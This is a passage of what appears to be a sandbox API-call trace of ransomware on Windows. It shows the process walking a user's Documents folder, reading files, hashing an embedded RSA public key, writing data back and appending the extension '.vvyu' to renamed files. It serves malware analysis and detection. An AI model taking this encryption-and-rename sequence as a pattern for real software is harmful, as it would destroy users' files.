[0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2ba8 | out: hHeap=0x2c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.245] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x14014, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x14014, lpOverlapped=0x0) returned 1 [0189.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.246] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14019, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.246] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.248] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.248] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.248] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.248] CloseHandle (hObject=0x584) returned 1 [0189.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.251] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\MuVmmckS_6uXC.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\muvmmcks_6uxc.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\MuVmmckS_6uXC.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\muvmmcks_6uxc.pptx.vvyu")) returned 1 [0189.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.253] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.256] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0189.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0189.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0189.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0189.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.257] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2ae00c8 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40688 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0189.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40370 [0189.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0189.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40580 | out: hHeap=0x2c0000) returned 1 [0189.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0189.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ecd8 [0189.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.260] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0189.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0189.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0189.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.261] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe2a8c0, ftCreationTime.dwHighDateTime=0x1d89af6, ftLastAccessTime.dwLowDateTime=0xb9e3fe50, ftLastAccessTime.dwHighDateTime=0x1d89f26, ftLastWriteTime.dwLowDateTime=0xb9e3fe50, ftLastWriteTime.dwHighDateTime=0x1d89f26, nFileSizeHigh=0x0, nFileSizeLow=0x9870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N6jq6Ucc95w9.docx", cAlternateFileName="N6JQ6U~1.DOC")) returned 1 [0189.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ba8 [0189.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2ba8 | out: hHeap=0x2c0000) returned 1 [0189.261] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\N6jq6Ucc95w9.docx") returned=".docx" [0189.261] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\N6jq6Ucc95w9.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\n6jq6ucc95w9.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.262] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=39024) returned 1 [0189.262] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.267] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x984a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.267] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.269] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.269] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9870, lpOverlapped=0x0) returned 1 [0189.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.270] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.271] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.271] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.271] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.271] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.271] GetLastError () returned 0x0 [0189.271] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.272] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.272] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.272] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.272] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9870) returned 0x2af5168 [0189.272] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ba8 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2bf0 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.273] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0daf0 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: 